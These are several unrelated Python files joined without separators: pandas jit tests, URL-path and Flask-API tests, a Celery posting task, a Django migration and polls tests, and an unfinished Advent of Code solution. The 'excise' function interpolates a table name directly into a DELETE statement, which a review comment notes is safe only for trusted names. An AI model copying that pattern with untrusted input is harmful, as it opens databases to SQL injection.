        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), test_impl())
        self.assertEqual(count_array_REPs(), 0)

    @skip_numba_jit
    def test_unique_parallel(self):
        """Series.unique on a parquet-loaded float column, distributed."""
        # TODO: test without file
        def test_impl():
            df = pq.read_table('example.parquet').to_pandas()
            return (df.four.unique() == 3.0).sum()

        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), test_impl())
        self.assertEqual(count_array_REPs(), 0)

    @unittest.skip('AssertionError - fix needed\n'
                   '2 != 1\n')
    def test_unique_str_parallel(self):
        """Series.unique on a parquet-loaded string column, distributed."""
        # TODO: test without file
        def test_impl():
            df = pq.read_table('example.parquet').to_pandas()
            return (df.two.unique() == 'foo').sum()

        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), test_impl())
        self.assertEqual(count_array_REPs(), 0)

    @skip_numba_jit
    @skip_sdc_jit('Not implemented in sequential transport layer')
    def test_describe(self):
        """Series.describe compiles and stays distributed (output not checked yet)."""
        def test_impl(n):
            df = pd.DataFrame({'A': np.arange(0, n, 1, np.float64)})
            return df.A.describe()

        hpat_func = self.jit(test_impl)
        n = 1001
        hpat_func(n)
        # XXX: test actual output
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    def test_str_contains_regex(self):
        """Series.str.contains with regex=True: 'AB*' matches 'ABC' and 'ADEF'."""
        def test_impl():
            A = StringArray(['ABC', 'BB', 'ADEF'])
            df = pd.DataFrame({'A': A})
            B = df.A.str.contains('AB*', regex=True)
            return B.sum()

        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), 2)

    @skip_numba_jit
    def test_str_contains_noregex(self):
        """Series.str.contains with regex=False: literal 'BB' matches one row."""
        def test_impl():
            A = StringArray(['ABC', 'BB', 'ADEF'])
            df = pd.DataFrame({'A': A})
            B = df.A.str.contains('BB', regex=False)
            return B.sum()

        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), 1)

    @skip_numba_jit
    def test_str_replace_regex(self):
        """Series.str.replace with regex=True against the pandas result."""
        def test_impl(df):
            return df.A.str.replace('AB*', 'EE', regex=True)

        df = pd.DataFrame({'A': ['ABCC', 'CABBD']})
        hpat_func = self.jit(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)

    @skip_numba_jit
    def test_str_replace_noregex(self):
        """Series.str.replace with regex=False against the pandas result."""
        def test_impl(df):
            return df.A.str.replace('AB', 'EE', regex=False)

        df = pd.DataFrame({'A': ['ABCC', 'CABBD']})
        hpat_func = self.jit(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)

    @skip_numba_jit
    def test_str_replace_regex_parallel(self):
        """Series.str.replace with explicitly distributed input/output chunks."""
        def test_impl(df):
            B = df.A.str.replace('AB*', 'EE', regex=True)
            return B

        n = 5
        A = ['ABCC', 'CABBD', 'CCD', 'CCDAABB', 'ED']
        # each rank only holds its own slice of the data
        start, end = get_start_end(n)
        df = pd.DataFrame({'A': A[start:end]})
        hpat_func = self.jit(distributed={'df', 'B'})(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)
        self.assertEqual(count_array_REPs(), 3)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    def test_str_split(self):
        """Series.str.split(',') incl. single-token, empty, and short strings.

        NOTE(review): a later method in this class re-defines ``test_str_split``
        and silently shadows this one under unittest discovery.
        """
        def test_impl(df):
            return df.A.str.split(',')

        df = pd.DataFrame({'A': ['AB,CC', 'C,ABB,D', 'G', '', 'g,f']})
        hpat_func = self.jit(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)

    @skip_numba_jit
    def test_str_split_default(self):
        """Series.str.split() with no separator (whitespace splitting, incl. tabs)."""
        def test_impl(df):
            return df.A.str.split()

        df = pd.DataFrame({'A': ['AB CC', 'C ABB D', 'G ', ' ', 'g\t f']})
        hpat_func = self.jit(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)

    @skip_numba_jit
    def test_str_split_filter(self):
        """Filter a DataFrame by the length of list values produced by str.split."""
        def test_impl(df):
            B = df.A.str.split(',')
            df2 = pd.DataFrame({'B': B})
            return df2[df2.B.str.len() > 1]

        df = pd.DataFrame({'A': ['AB,CC', 'C,ABB,D', 'G', '', 'g,f']})
        hpat_func = self.jit(test_impl)
        # index reset on the pandas side: jit output uses a fresh RangeIndex
        pd.testing.assert_frame_equal(
            hpat_func(df), test_impl(df).reset_index(drop=True))

    @skip_numba_jit
    def test_str_split_box_df(self):
        """Boxing a DataFrame whose column holds list-of-string values."""
        def test_impl(df):
            return pd.DataFrame({'B': df.A.str.split(',')})

        df = pd.DataFrame({'A': ['AB,CC', 'C,ABB,D']})
        hpat_func = self.jit(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df).B, test_impl(df).B, check_names=False)

    @skip_numba_jit
    def test_str_split_unbox_df(self):
        """Unboxing a DataFrame whose column holds list-of-string values."""
        def test_impl(df):
            return df.A.iloc[0]

        df = pd.DataFrame({'A': ['AB,CC', 'C,ABB,D']})
        # df2's A column contains lists produced by str.split
        df2 = pd.DataFrame({'A': df.A.str.split(',')})
        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(df2), test_impl(df2))

    @unittest.skip('Getitem Series with list values not implement')
    def test_str_split_bool_index(self):
        """Boolean-mask getitem on a Series of list values (currently unsupported)."""
        def test_impl(df):
            C = df.A.str.split(',')
            return C[df.B == 'aa']

        df = pd.DataFrame({'A': ['AB,CC', 'C,ABB,D'], 'B': ['aa', 'bb']})
        hpat_func = self.jit(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)

    @skip_numba_jit
    def test_str_split_parallel(self):
        """Series.str.split with explicitly distributed input/output chunks."""
        def test_impl(df):
            B = df.A.str.split(',')
            return B

        n = 5
        # each rank only holds its own slice of the data
        start, end = get_start_end(n)
        A = ['AB,CC', 'C,ABB,D', 'CAD', 'CA,D', 'AA,,D']
        df = pd.DataFrame({'A': A[start:end]})
        hpat_func = self.jit(distributed={'df', 'B'})(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)
        self.assertEqual(count_array_REPs(), 3)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    def test_str_get(self):
        """Series.str.get(1) on list values produced by str.split."""
        def test_impl(df):
            B = df.A.str.split(',')
            return B.str.get(1)

        df = pd.DataFrame({'A': ['AB,CC', 'C,ABB,D']})
        hpat_func = self.jit(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)

    @skip_numba_jit
    def test_str_split_basic(self):
        """Series.str.split(',') smoke test on two multi-token strings.

        Renamed from ``test_str_split``: this class already defines a more
        thorough ``test_str_split`` earlier, and a second method with the same
        name silently shadowed it under unittest discovery.
        """
        def test_impl(df):
            return df.A.str.split(',')

        df = pd.DataFrame({'A': ['AB,CC', 'C,ABB,D']})
        hpat_func = self.jit(test_impl)
        pd.testing.assert_series_equal(hpat_func(df), test_impl(df), check_names=False)

    @skip_numba_jit
    def test_str_get_parallel(self):
        """Series.str.get on split results with distributed input/output."""
        def test_impl(df):
            A = df.A.str.split(',')
            B = A.str.get(1)
            return B

        n = 5
        # each rank only holds its own slice of the data
        start, end = get_start_end(n)
        A = ['AB,CC', 'C,ABB,D', 'CAD,F', 'CA,D', 'AA,,D']
        df = pd.DataFrame({'A': A[start:end]})
        hpat_func = self.jit(distributed={'df', 'B'})(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)
        self.assertEqual(count_array_REPs(), 3)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    def test_str_get_to_numeric(self):
        """pd.to_numeric over str.get results, with C typed int64 via locals."""
        def test_impl(df):
            B = df.A.str.split(',')
            C = pd.to_numeric(B.str.get(1), errors='coerce')
            return C

        df = pd.DataFrame({'A': ['AB,12', 'C,321,D']})
        hpat_func = self.jit(locals={'C': types.int64[:]})(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)

    @skip_numba_jit
    def test_str_flatten(self):
        """Flatten split results into a single Series via itertools.chain."""
        def test_impl(df):
            A = df.A.str.split(',')
            return pd.Series(list(itertools.chain(*A)))

        df = pd.DataFrame({'A': ['AB,CC', 'C,ABB,D']})
        hpat_func = self.jit(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)

    @skip_numba_jit
    def test_str_flatten_parallel(self):
        """Flatten split results with distributed input/output chunks."""
        def test_impl(df):
            A = df.A.str.split(',')
            B = pd.Series(list(itertools.chain(*A)))
            return B

        n = 5
        # each rank only holds its own slice of the data
        start, end = get_start_end(n)
        A = ['AB,CC', 'C,ABB,D', 'CAD', 'CA,D', 'AA,,D']
        df = pd.DataFrame({'A': A[start:end]})
        hpat_func = self.jit(distributed={'df', 'B'})(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)
        self.assertEqual(count_array_REPs(), 3)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    def test_to_numeric(self):
        """pd.to_numeric on a string column, with C typed float64 via locals."""
        def test_impl(df):
            B = pd.to_numeric(df.A, errors='coerce')
            return B

        df = pd.DataFrame({'A': ['123.1', '331.2']})
        hpat_func = self.jit(locals={'B': types.float64[:]})(test_impl)
        pd.testing.assert_series_equal(
            hpat_func(df), test_impl(df), check_names=False)

    @skip_numba_jit
    def test_1D_Var_len(self):
        """len() of a column after a filter (1D_Var distribution), distributed."""
        def test_impl(n):
            df = pd.DataFrame({'A': np.arange(n), 'B': np.arange(n) + 1.0})
            df1 = df[df.A > 5]
            return len(df1.B)

        hpat_func = self.jit(test_impl)
        n = 11
        self.assertEqual(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    def test_rolling1(self):
        """Series.rolling(...).sum with window 3 (no unroll) and window 7 (unroll)."""
        # size 3 without unroll
        def test_impl(n):
            df = pd.DataFrame({'A': np.arange(n), 'B': np.random.ranf(n)})
            Ac = df.A.rolling(3).sum()
            return Ac.sum()

        hpat_func = self.jit(test_impl)
        n = 121
        self.assertEqual(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

        # size 7 with unroll
        def test_impl_2(n):
            df = pd.DataFrame({'A': np.arange(n) + 1.0, 'B': np.random.ranf(n)})
            Ac = df.A.rolling(7).sum()
            return Ac.sum()

        # BUG FIX: the original re-jitted ``test_impl`` here, so the window-7
        # variant defined above was never compiled or checked.
        hpat_func = self.jit(test_impl_2)
        n = 121
        self.assertEqual(hpat_func(n), test_impl_2(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    def test_rolling2(self):
        """Centered rolling mean assigned to a new (space-named) column."""
        def test_impl(n):
            df = pd.DataFrame({'A': np.ones(n), 'B': np.random.ranf(n)})
            df['moving average'] = df.A.rolling(window=5, center=True).mean()
            return df['moving average'].sum()

        hpat_func = self.jit(test_impl)
        n = 121
        self.assertEqual(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    def test_rolling3(self):
        """Centered rolling apply with a user lambda over a 3-wide window."""
        def test_impl(n):
            df = pd.DataFrame({'A': np.ones(n), 'B': np.random.ranf(n)})
            Ac = df.A.rolling(3, center=True).apply(lambda a: a[0] + 2 * a[1] + a[2])
            return Ac.sum()

        hpat_func = self.jit(test_impl)
        n = 121
        self.assertEqual(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @unittest.skip('Error - fix needed\n'
                   'NUMA_PES=3 build')
    def test_shift1(self):
        """Series.shift(1) followed by a reduction, checked for distribution."""
        def test_impl(n):
            df = pd.DataFrame({'A': np.arange(n) + 1.0, 'B': np.random.ranf(n)})
            Ac = df.A.shift(1)
            return Ac.sum()

        hpat_func = self.jit(test_impl)
        n = 11
        self.assertEqual(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @unittest.skip('Error - fix needed\n'
                   'NUMA_PES=3 build')
    def test_shift2(self):
        """Series.pct_change(1) followed by a reduction, checked for distribution."""
        def test_impl(n):
            df = pd.DataFrame({'A': np.arange(n) + 1.0, 'B': np.random.ranf(n)})
            Ac = df.A.pct_change(1)
            return Ac.sum()

        hpat_func = self.jit(test_impl)
        n = 11
        np.testing.assert_almost_equal(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    def test_df_input(self):
        """Passing a numeric DataFrame into a jitted function (unboxing)."""
        def test_impl(df):
            return df.B.sum()

        n = 121
        df = pd.DataFrame({'A': np.ones(n), 'B': np.random.ranf(n)})
        hpat_func = self.jit(test_impl)
        np.testing.assert_almost_equal(hpat_func(df), test_impl(df))

    @skip_numba_jit
    def test_df_input2(self):
        """Passing a DataFrame with a string column into a jitted function."""
        def test_impl(df):
            C = df.B == 'two'
            return C.sum()

        n = 11
        df = pd.DataFrame({'A': np.random.ranf(3 * n), 'B': ['one', 'two', 'three'] * n})
        hpat_func = self.jit(test_impl)
        np.testing.assert_almost_equal(hpat_func(df), test_impl(df))

    @skip_numba_jit
    def test_df_input_dist1(self):
        """Passing a distributed DataFrame chunk into a jitted function.

        Cleanup: the original assigned ``n = 121`` and immediately overwrote
        it with ``n = 5``; the dead assignment is removed.
        """
        def test_impl(df):
            return df.B.sum()

        A = [3, 4, 5, 6, 1]
        B = [5, 6, 2, 1, 3]
        n = 5
        # df_h holds only this rank's slice; df is the full (reference) frame
        start, end = get_start_end(n)
        df = pd.DataFrame({'A': A, 'B': B})
        df_h = pd.DataFrame({'A': A[start:end], 'B': B[start:end]})
        hpat_func = self.jit(distributed={'df'})(test_impl)
        np.testing.assert_almost_equal(hpat_func(df_h), test_impl(df))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    def test_concat(self):
        """pd.concat of two DataFrames with partially overlapping columns."""
        def test_impl(n):
            df1 = pd.DataFrame({'key1': np.arange(n), 'A': np.arange(n) + 1.0})
            df2 = pd.DataFrame({'key2': n - np.arange(n), 'A': n + np.arange(n) + 1.0})
            df3 = pd.concat([df1, df2])
            return df3.A.sum() + df3.key2.sum()

        hpat_func = self.jit(test_impl)
        n = 11
        self.assertEqual(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)
        # repeat with a much larger input to exercise the distributed path
        n = 11111
        self.assertEqual(hpat_func(n), test_impl(n))

    @skip_numba_jit
    def test_concat_str(self):
        """pd.concat of two parquet-loaded DataFrames with string columns."""
        def test_impl():
            df1 = pq.read_table('example.parquet').to_pandas()
            df2 = pq.read_table('example.parquet').to_pandas()
            A3 = pd.concat([df1, df2])
            return (A3.two == 'foo').sum()

        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), test_impl())
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    def test_concat_series(self):
        """pd.concat of two Series columns, small and large inputs."""
        def test_impl(n):
            df1 = pd.DataFrame({'key1': np.arange(n), 'A': np.arange(n) + 1.0})
            df2 = pd.DataFrame({'key2': n - np.arange(n), 'A': n + np.arange(n) + 1.0})
            A3 = pd.concat([df1.A, df2.A])
            return A3.sum()

        hpat_func = self.jit(test_impl)
        n = 11
        self.assertEqual(hpat_func(n), test_impl(n))
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)
        # repeat with a much larger input to exercise the distributed path
        n = 11111
        self.assertEqual(hpat_func(n), test_impl(n))

    @skip_numba_jit
    def test_concat_series_str(self):
        """pd.concat of two parquet-loaded string Series."""
        def test_impl():
            df1 = pq.read_table('example.parquet').to_pandas()
            df2 = pq.read_table('example.parquet').to_pandas()
            A3 = pd.concat([df1.two, df2.two])
            return (A3 == 'foo').sum()

        hpat_func = self.jit(test_impl)
        self.assertEqual(hpat_func(), test_impl())
        self.assertEqual(count_array_REPs(), 0)
        self.assertEqual(count_parfor_REPs(), 0)

    @skip_numba_jit
    @unittest.skipIf(int(os.getenv('SDC_NP_MPI', '0')) > 1, 'Test hangs on NP=2 and NP=3 on all platforms')
    def test_intraday(self):
        """End-to-end intraday-trading kernel inside an sdc.prange loop:
        rolling std/mean, shift, boolean column logic, and mask selection
        per symbol; the outer prange is the only parallel (OneD) construct."""
        def test_impl(nsyms):
            max_num_days = 100
            all_res = 0.0
            for i in sdc.prange(nsyms):
                # synthetic per-symbol price history
                s_open = 20 * np.ones(max_num_days)
                s_low = 28 * np.ones(max_num_days)
                s_close = 19 * np.ones(max_num_days)
                df = pd.DataFrame({'Open': s_open, 'Low': s_low, 'Close': s_close})
                df['Stdev'] = df['Close'].rolling(window=90).std()
                df['Moving Average'] = df['Close'].rolling(window=20).mean()
                df['Criteria1'] = (df['Open'] - df['Low'].shift(1)) < -df['Stdev']
                df['Criteria2'] = df['Open'] > df['Moving Average']
                df['BUY'] = df['Criteria1'] & df['Criteria2']
                df['Pct Change'] = (df['Close'] - df['Open']) / df['Open']
                df['Rets'] = df['Pct Change'][df['BUY']]
                all_res += df['Rets'].mean()
            return all_res

        hpat_func = self.jit(test_impl)
        n = 11
        self.assertEqual(hpat_func(n), test_impl(n))
        # per-symbol arrays stay replicated; only the outer prange is OneD
        self.assertEqual(count_array_OneDs(), 0)
        self.assertEqual(count_parfor_OneDs(), 1)

    @skip_numba_jit
    def test_var_dist1(self):
        """groupby + setitem with distributed inputs and a distributed return.

        Currently only checks that compilation and execution succeed; the
        result comparison is still TODO (see the commented assert below).
        """
        def test_impl(A, B):
            df = pd.DataFrame({'A': A, 'B': B})
            df2 = df.groupby('A', as_index=False)['B'].sum()
            # TODO: fix handling of df setitem to force match of array dists
            # probably with a new node that is appended to the end of basic block
            # df2['C'] = np.full(len(df2.B), 3, np.int8)
            # TODO: full_like for Series
            df2['C'] = np.full_like(df2.B.values, 3, np.int8)
            return df2

        A = np.array([1, 1, 2, 3])
        B = np.array([3, 4, 5, 6])
        hpat_func = self.jit(locals={'A:input': 'distributed',
                                     'B:input': 'distributed', 'df2:return': 'distributed'})(test_impl)
        start, end = get_start_end(len(A))
        df2 = hpat_func(A[start:end], B[start:end])
        # TODO:
        # pd.testing.assert_frame_equal(
        #     hpat_func(A[start:end], B[start:end]), test_impl(A, B))


if __name__ == "__main__":
    # Allow running this test module directly, outside a test runner.
    unittest.main()

import pytest
import urllib.error
from urlpathlib import UrlPath


def test_scheme():
    """A plain filesystem path is supported: touch() must not raise."""

    # does not raise NotImplementedError
    UrlPath('/dev/null').touch()


def test_scheme_not_supported():
    """touch() on a known-but-unsupported scheme (http) raises NotImplementedError."""

    with pytest.raises(NotImplementedError):
        UrlPath('http:///tmp/test').touch()


def test_scheme_not_listed():
    """touch() on an unknown scheme raises NotImplementedError."""

    with pytest.raises(NotImplementedError):
        UrlPath('test:///tmp/test').touch()


def test_file_additional():
    """resolve() of '.' matches the current working directory."""

    assert UrlPath('.').resolve() == UrlPath.cwd()


def test_scheme_alias():
    """https aliases to the http handler: exists() reaches the network layer
    (URLError from the unreachable host) instead of NotImplementedError."""

    # does not raise NotImplementedError
    with pytest.raises(urllib.error.URLError):
        UrlPath('https://localhost/test').exists()

# coding: utf8
from __future__ import unicode_literals
from flask import abort, make_response, request
from flask_api.decorators import set_renderers
from flask_api import exceptions, renderers, status, FlaskAPI
import json
import unittest


app = FlaskAPI(__name__)
app.config['TESTING'] = True


class JSONVersion1(renderers.JSONRenderer):
    """JSON renderer bound to the versioned media type api-version 1.0."""
    media_type = 'application/json; api-version="1.0"'


class JSONVersion2(renderers.JSONRenderer):
    """JSON renderer bound to the versioned media type api-version 2.0."""
    media_type = 'application/json; api-version="2.0"'


@app.route('/set_status_and_headers/')
def set_status_and_headers():
    """Return content together with an explicit status code and extra headers."""
    return (
        {'example': 'content'},
        status.HTTP_201_CREATED,
        {'Location': 'http://example.com/456'},
    )


@app.route('/set_headers/')
def set_headers():
    """Return content plus extra headers, leaving the status at its default."""
    return {'example': 'content'}, {'Location': 'http://example.com/456'}


@app.route('/make_response_view/')
def make_response_view():
    """Build the response explicitly with make_response() and set a header on it."""
    resp = make_response({'example': 'content'})
    resp.headers['Location'] = 'http://example.com/456'
    return resp


@app.route('/api_exception/')
def api_exception():
    """View that raises a Flask-API exception (rendered as a JSON error body)."""
    raise exceptions.PermissionDenied()


@app.route('/abort_view/')
def abort_view():
    """View that aborts with 403 via flask.abort."""
    abort(status.HTTP_403_FORBIDDEN)


@app.route('/options/')
def options_view():
    """Minimal view returning an empty mapping; used for the OPTIONS regression test."""
    return {}


@app.route('/accepted_media_type/')
@set_renderers([JSONVersion2, JSONVersion1])
def accepted_media_type():
    """Echo the media type negotiated for this request (version 2.0 is preferred,
    being listed first in set_renderers)."""
    return {'accepted_media_type': str(request.accepted_media_type)}


class AppTests(unittest.TestCase):
    """Integration tests for the module-level Flask-API app defined above."""

    def test_set_status_and_headers(self):
        """(content, status, headers) tuple return sets all three on the response."""
        with app.test_client() as client:
            response = client.get('/set_status_and_headers/')
            self.assertEqual(response.status_code, status.HTTP_201_CREATED)
            self.assertEqual(response.headers['Location'], 'http://example.com/456')
            self.assertEqual(response.content_type, 'application/json')
            expected = '{"example": "content"}'
            self.assertEqual(response.get_data().decode('utf8'), expected)

    def test_set_headers(self):
        """(content, headers) tuple return keeps the default 200 status."""
        with app.test_client() as client:
            response = client.get('/set_headers/')
            self.assertEqual(response.status_code, status.HTTP_200_OK)
            self.assertEqual(response.headers['Location'], 'http://example.com/456')
            self.assertEqual(response.content_type, 'application/json')
            expected = '{"example": "content"}'
            self.assertEqual(response.get_data().decode('utf8'), expected)

    def test_make_response(self):
        """make_response() output renders as JSON with the mutated header.

        Cleanup: the original asserted content_type twice; the duplicate
        assertion is removed.
        """
        with app.test_client() as client:
            response = client.get('/make_response_view/')
            self.assertEqual(response.content_type, 'application/json')
            self.assertEqual(response.headers['Location'], 'http://example.com/456')
            expected = '{"example": "content"}'
            self.assertEqual(response.get_data().decode('utf8'), expected)

    def test_api_exception(self):
        """A raised APIException becomes a JSON error body with its status code."""
        with app.test_client() as client:
            response = client.get('/api_exception/')
            self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
            self.assertEqual(response.content_type, 'application/json')
            expected = '{"message": "You do not have permission to perform this action."}'
            self.assertEqual(response.get_data().decode('utf8'), expected)

    def test_abort_view(self):
        """flask.abort propagates its status code."""
        with app.test_client() as client:
            response = client.get('/abort_view/')
            self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_options_view(self):
        """Regression: get_data() on an OPTIONS response must not blow up."""
        with app.test_client() as client:
            response = client.options('/options/')
        # Errors if `response.response` is `None`
        response.get_data()

    def test_accepted_media_type_property(self):
        """request.accepted_media_type reflects content negotiation."""
        with app.test_client() as client:
            # Explicitly request the "api-version 1.0" renderer.
            headers = {'Accept': 'application/json; api-version="1.0"'}
            response = client.get('/accepted_media_type/', headers=headers)
            data = json.loads(response.get_data().decode('utf8'))
            expected = {'accepted_media_type': 'application/json; api-version="1.0"'}
            self.assertEqual(data, expected)

            # Request the default renderer, which is "api-version 2.0".
            headers = {'Accept': '*/*'}
            response = client.get('/accepted_media_type/', headers=headers)
            data = json.loads(response.get_data().decode('utf8'))
            expected = {'accepted_media_type': 'application/json; api-version="2.0"'}
            self.assertEqual(data, expected)

from celery.task import Task

import requests

class StracksFlushTask(Task):
    """Celery task that POSTs collected data to the given Stracks endpoint."""
    def run(self, url, data):
        # Trailing slash appended to the URL before posting.
        # NOTE(review): no timeout or error handling here — an unreachable or
        # slow server blocks the worker; consider requests.post(..., timeout=...).
        requests.post(url + "/", data=data)


# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):
    """Add a nullable ``postgres_db_url`` text field to FreeBasicsController."""

    dependencies = [
        ('freebasics', '0006_change_site_url_field_type'),
    ]

    operations = [
        migrations.AddField(
            model_name='freebasicscontroller',
            name='postgres_db_url',
            field=models.TextField(null=True, blank=True),
        ),
    ]

def excise(conn, qrelname, tid):
    """Delete the tuple at ctid *tid* from table *qrelname*.

    Returns the deleted row's ``id`` for bookkeeping, or None when no tuple
    lives at that ctid.

    Assumes an 'id' column exists and prints that for bookkeeping.

    TODO: Instead should find unique constraints and print those, or try
    to print all attributes that are not corrupt.

    NOTE(review): *qrelname* is interpolated into the SQL text — presumably
    it is an already-quoted relation name from a trusted source; verify.
    """
    sql = 'DELETE FROM {0} WHERE ctid = %s RETURNING id'.format(qrelname)
    with conn.cursor() as cur:
        cur.execute(sql, (tid,))
        row = cur.fetchone()
    return row[0] if row else None

import datetime

from django.utils import timezone
from django.test import TestCase
from django.urls import reverse

from .models import Question

class QuestionMethodTests(TestCase):
    """Unit tests for Question.was_published_recently()."""

    def test_was_published_recently_with_future_question(self):
        """Returns False when pub_date lies in the future."""
        pub_time = timezone.now() + datetime.timedelta(days=30)
        question = Question(pub_date=pub_time)
        self.assertIs(question.was_published_recently(), False)

    def test_was_published_recently_with_old_question(self):
        """Returns False when pub_date is more than a day old."""
        pub_time = timezone.now() - datetime.timedelta(days=30)
        question = Question(pub_date=pub_time)
        self.assertIs(question.was_published_recently(), False)

    def test_was_published_recently_with_recent_question(self):
        """Returns True when pub_date falls within the last day."""
        pub_time = timezone.now() - datetime.timedelta(hours=1)
        question = Question(pub_date=pub_time)
        self.assertIs(question.was_published_recently(), True)

def create_question(question_text, days):
    """Create and persist a Question published ``days`` offset from now.

    Negative ``days`` yields a question published in the past; positive,
    one whose publication is still pending.
    """
    pub_time = timezone.now() + datetime.timedelta(days=days)
    return Question.objects.create(question_text=question_text, pub_date=pub_time)


class QuestionViewTests(TestCase):
    """Tests for the polls index view's filtering of past vs future questions."""

    def test_index_view_with_no_questions(self):
        """
        If no questions exist, an appropriate message should be displayed.
        """
        response = self.client.get(reverse('polls:index'))
        self.assertEqual(response.status_code, 200)
        self.assertContains(response, "No polls are available.")
        self.assertQuerysetEqual(response.context['latest_question_list'], [])

    def test_index_view_with_a_past_question(self):
        """
        Questions with a pub_date in the past should be displayed on the
        index page.
        """
        create_question(question_text="Past question.", days=-30)
        response = self.client.get(reverse('polls:index'))
        self.assertQuerysetEqual(
            response.context['latest_question_list'],
            ['<Question: Past question.>']
        )

    def test_index_view_with_a_future_question(self):
        """
        Questions with a pub_date in the future should not be displayed on
        the index page.
        """
        create_question(question_text="Future question.", days=30)
        response = self.client.get(reverse('polls:index'))
        self.assertContains(response, "No polls are available.")
        self.assertQuerysetEqual(response.context['latest_question_list'], [])

    def test_index_view_with_future_question_and_past_question(self):
        """
        Even if both past and future questions exist, only past questions
        should be displayed.
        """
        create_question(question_text="Past question.", days=-30)
        create_question(question_text="Future question.", days=30)
        response = self.client.get(reverse('polls:index'))
        self.assertQuerysetEqual(
            response.context['latest_question_list'],
            ['<Question: Past question.>']
        )

    def test_index_view_with_two_past_questions(self):
        """
        The questions index page may display multiple questions.
        """
        create_question(question_text="Past question 1.", days=-30)
        create_question(question_text="Past question 2.", days=-5)
        response = self.client.get(reverse('polls:index'))
        # most recent first
        self.assertQuerysetEqual(
            response.context['latest_question_list'],
            ['<Question: Past question 2.>', '<Question: Past question 1.>']
        )

class QuestionIndexDetailTests(TestCase):
    def test_detail_view_with_a_future_question(self):
        """Requesting the detail page of a future question yields a 404."""
        question = create_question(question_text='Future question.', days=5)
        detail_url = reverse('polls:detail', args=(question.id,))
        self.assertEqual(self.client.get(detail_url).status_code, 404)

    def test_detail_view_with_a_past_question(self):
        """The detail page of a past question shows the question's text."""
        question = create_question(question_text='Past Question.', days=-5)
        detail_url = reverse('polls:detail', args=(question.id,))
        self.assertContains(self.client.get(detail_url), question.question_text)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""--- Day 3: Perfectly Spherical Houses in a Vacuum ---

Santa is delivering presents to an infinite two-dimensional grid of houses.

He begins by delivering a present to the house at his starting location, and
then an elf at the North Pole calls him via radio and tells him where to move
next. Moves are always exactly one house to the north (^), south (v), east (>),
or west (<). After each move, he delivers another present to the house at his
new location.

However, the elf back at the north pole has had a little too much eggnog, and
so his directions are a little off, and Santa ends up visiting some houses more
than once. How many houses receive at least one present?

For example:

- > delivers presents to 2 houses: one at the starting location, and one to the
east.
- ^>v< delivers presents to 4 houses in a square, including twice to the
house at his starting/ending location.
- ^v^v^v^v^v delivers a bunch of presents
to some very lucky children at only 2 houses.

--- Part Two ---

The next year, to speed up the process, Santa creates a robot version of
himself, Robo-Santa, to deliver presents with him.

Santa and Robo-Santa start at the same location (delivering two presents to the
same starting house), then take turns moving based on instructions from the
elf, who is eggnoggedly reading from the same script as the previous year.

This year, how many houses receive at least one present?

For example:
- ^v delivers presents to 3 houses, because Santa goes north, and then Robo-Santa
  goes south.
- ^>v< now delivers presents to 3 houses, and Santa and Robo-Santa
  end up back where they started.
- ^v^v^v^v^v now delivers presents to 11 houses,
  with Santa going one direction and Robo-Santa going the other.
"""
import sys

import click


def update_point(move, point):
    """Return the (x, y) position reached after applying *move* to *point*.

    move: one of '^', 'v', '<', '>'; any other character is a no-op.
